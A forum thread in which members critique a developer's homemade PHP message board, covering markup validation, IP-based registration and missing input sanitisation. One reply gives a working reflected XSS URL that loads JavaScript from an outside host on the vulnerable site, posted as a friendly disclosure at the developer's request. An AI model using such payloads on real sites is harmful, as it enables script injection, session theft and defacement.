My Micro Forum

[kristopherWindsor]

You can test this forum, or even embed threads in your web pages.

 

Details are here: 

http://fusionware.ourproject.org/itech/microforum/index.php

 

 

[Lumio]

If I click on register without typing a name... I get into it

 

All-in-one:

Not my flavor

[gazever]

dont like the frames

[gazever]

lots of validation errors

[AXiSS]

No code for insterting URL's and stuff? It sucks.

[kristopherWindsor]

-> No code for insterting URL's and stuff? It sucks.

 

Yes there is. It is the same as on this forum. google.com

 

-> lots of validation errors

 

I think they are features, not bugs. Of course I don't validate emails, but why would someone put a fake email when they don't have to?

 

-> If I click on register without typing a name... I get into it.

 

That is a feature. It will name you with the first 7 digits of your IP Address.

 

-> Not my flavor

 

Why??? 

[Jessica]

I love the old "It's not a bug, it's a feature" excuse. Nice.

[JBS103]

I'm not sure I understand the entire concept behind this.

 

The frames make the website pretty difficult to read, the green and white background is distracting, and your user method isn't working because when I log in with no name, it says I have about 3 more posts than I have ever made.

[kristopherWindsor]

If you embed a thread in your own web page, then it will use the style of that page instead of mine. Note, the threads themselves have no formatting:

http://fusionware.ourproject.org/itech/microforum/viewthread.php?c=Micro%20Forum

 

The forum tracks people by the first seven digits of their IP Address. Maybe someone else has the same first seven digits?

[AXiSS]

I love the old "It's not a bug, it's a feature" excuse. Nice.

 

Screwed up code always sets your website apart. Its a feature that makes yours different from all others.

[roopurt18]

I think the original comment about validation errors were in response to the page itself not having valid markup, not the lack of validation by his forms.

 

Personally, I don't care if you validate data or not, but you should at least sanitize it.

[ted_chou12]

I believe this is rather like a guestbook than a forum, btw, how is the permenant cookie done?

[kristopherWindsor]

-> I believe this is rather like a guestbook than a forum, btw, how is the preferment cookie done?

 

My program makes a folder on the server named after the first seven digits of your IP Address, so its existence tells the program you have already registered.

 

-> I think the original comment about validation errors were in response to the page itself not having valid markup, not the lack of validation by his forms.

 

You mean the <br> vs. <br /> war?? <br> wins because the browser can process it just as fast. But what validation is missing??

 

-> Screwed up code always sets your website apart.

 

Examples?

[Lumio]

You mean the <br> vs. <br /> war?? <br> wins because the browser can process it just as fast. But what validation is missing??

You know W3C right? So look at yourself: http://validator.w3.org/

 

I get 10 errors only of the startpage

 

Also you don't use quotes. I mean... you write <img src=source> - Better: <img src="source" />

The slash is because it is a single-tag.

[alpine]

Better: <img src="source" />

The slash is because it is a single-tag.

Just remember the difference on html vs xhtml

[Lumio]

Yes that's true.

But if you use a doctype (what you must set into the beginning of the page) like

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

you must add that slashes at single tags

[alpine]

...if doctype is xhtml - not html

[JoshF]

I think you should change the colors.

[kristopherWindsor]

-> I think you should change the colors.

 

The style is only part of the home page, not the threads themselves. No style here: http://fusionware.ourproject.org/itech/microforum/viewthread.php?c=Windsor_Blog

 

-> Also you don't use quotes. I mean... you write <img src=source> - Better: <img src="source" />

 

I use quotes for sources defined by the users, but not for smilies.

 

-> The slash is because it is a single-tag.

 

It is pointless. Google does not use it, so go pick on them instead.

 

<a class=q href="http://blogsearch.google.com/?ie=UTF-8&oe=UTF-8&hl=en&tab=wb" onclick="return qs(this)">Blogs</a><br><a class=q href="http://books.google.com/bkshp?ie=UTF-8&oe=UTF-8&hl=en&tab=wp" onclick="return qs(this)">Books</a><br><a class=q href="http://froogle.google.com/frghp?ie=UTF-8&oe=UTF-8&hl=en&tab=wf" onclick="return qs(this)">Froogle</a><br><a class=q href="http://groups.google.com/grphp?ie=UTF-8&oe=UTF-8&hl=en&tab=wg" onclick="return qs(this)">Groups</a><br><a class=q href="http://www.google.com/ptshp?ie=UTF-8&oe=UTF-8&hl=en&tab=wt" onclick="return qs(this)">Patents</a><br>

 

-> So look at yourself: http://validator.w3.org/

 

The validator isn't working right. It says I am missing the "ACTION", but it is there:

 

Line 1 column 160: required attribute "ACTION" not specified.

...ter.</div><br><form enctype=multipart/form-data action="newprofile.php?c=Wind

The attribute given above is required for an element that you've used, but you have omitted it. For instance, in most HTML and XHTML document types the "type" attribute is required on the "script" element and the "alt" attribute is required for the "img" element. 

 

 

[obsidian]

You've got yourself wide open for someone who really wants to attack. Not only are we able to pull some information about structure from some of the PHP errors that are thrown, but in some of the pages, if you modify the URL just right, I can get my own javascript functions to run on your page (XSS vulnerabilities). One other thing: I simply placed a single quote in for my username, and not only did it take it, but it picked up someone else's signature information and avatar... not too hot.

[Lumio]

The validator isn't working right. It says I am missing the "ACTION", but it is there...

That's maybe because of some errors before the form-tag. So if you fix the errors before maybe it works.

[kristopherWindsor]

You've got yourself wide open for someone who really wants to attack. Not only are we able to pull some information about structure from some of the PHP errors that are thrown, but in some of the pages, if you modify the URL just right, I can get my own javascript functions to run on your page (XSS vulnerabilities). One other thing: I simply placed a single quote in for my username, and not only did it take it, but it picked up someone else's signature information and avatar... not too hot.

 

I think you are mistaken. The Username is loaded directly from a file, formatted, and displayed. It is not used for searching or logins. If your picture was a star, and your signature said "Have a nice day! ", that is because those are the defaults.

I don't think you can get JavaScript to run. Could you please show me without crashing my computer?

What PHP errors? Everyone says there are errors but won't show me!!! The page should either work fine or be blank.

[obsidian]

I think you are mistaken. The Username is loaded directly from a file, formatted, and displayed. It is not used for searching or logins. If your picture was a star, and your signature said "Have a nice day! ", that is because those are the defaults.

 

Ok, you're right on that one. My bad. I'm just not used to forums selecting an avatar and signature for me.

 

I don't think you can get JavaScript to run. Could you please show me without crashing my computer?

 

What PHP errors? Everyone says there are errors but won't show me!!! The page should either work fine or be blank.

 

Keep in mind that we are here to help test your stuff, and we're not going to bring things to light without testing them first. When most of the users on here recommend enhancements due to security holes, you probably ought to check them out first instead of denying their existence

 

http://fusionware.ourproject.org/itech/microforum/viewprofile.php?c=%3Cscript%20type=text/javascript%20src=http://phpfreaks.guahanweb.com/scripts/xss.js%3E%3C/script%3E

 

If you follow that link, you'll not only see the PHP errors to which people have been referring displayed, but you will also see how I've been able to hijack those errors to run my own Javascript. All I'm doing with it is posting a little alert box saying "I'm in!" and changing your background color and leaving you a message on the screen, but I could be running anything I wanted there.

 

I'll continue to browse and see if I can come up with anything else that works to get in, too.

[kristopherWindsor]

Thanks for finding that. I think I have stopped it by using die(). I am doing some other slight changes, now.

[darkcarnival]

i agree it needs alot more work.

 

validating is a absolute must. remember users are in nature dumb and will do whatever they want.

 

just because you wouldnt do something doesnt mean someone else wouldnt.

 

phpbb and Microsoft patch up code because they didnt think a user would exploit something that could be exploited

 

the color is off setting but thats just personal opinion.